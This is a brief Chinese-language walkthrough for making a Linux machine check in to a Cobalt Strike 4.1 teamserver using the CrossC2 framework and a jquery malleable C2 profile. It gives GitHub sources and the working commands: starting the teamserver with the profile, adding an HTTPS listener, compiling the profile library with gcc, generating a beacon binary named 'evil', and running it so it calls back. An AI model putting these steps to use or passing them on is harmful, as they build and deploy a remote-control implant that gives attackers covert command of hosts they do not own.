CobaltStrike上线Linux

实验环境

CobaltStrike4.1(服务端)

jquery-c2.4.0.profile(服务端)

jquery-c2.4.0.profile下载地址:https://github.com/Richard-Tang/CrossC2-C2Profile

cobaltstrike.beacon_keys(客户端)

CrossC2-C2Profile.so(客户端)

CrossC2-C2Profile.c源代码下载地址:https://github.com/Richard-Tang/CrossC2-C2Profile

genCrossC2.Linux(客户端)

genCrossC2.Linux的下载地址:https://github.com/gloxec/CrossC2

使用配置文件启动CobaltStrike4.1服务端

./teamserver [external IP] [password] [/path/to/my.profile]

添加https监听端口

CrossC2只支持https端口

编译生成so库

gcc c2profile.c -fPIC -shared -o CrossC2-C2Profile.so

使用so库生成二进制

genCrossC2.Linux IP Port cobaltstrike.beacon_keys lib_so Linux x64 evil

运行二进制,上线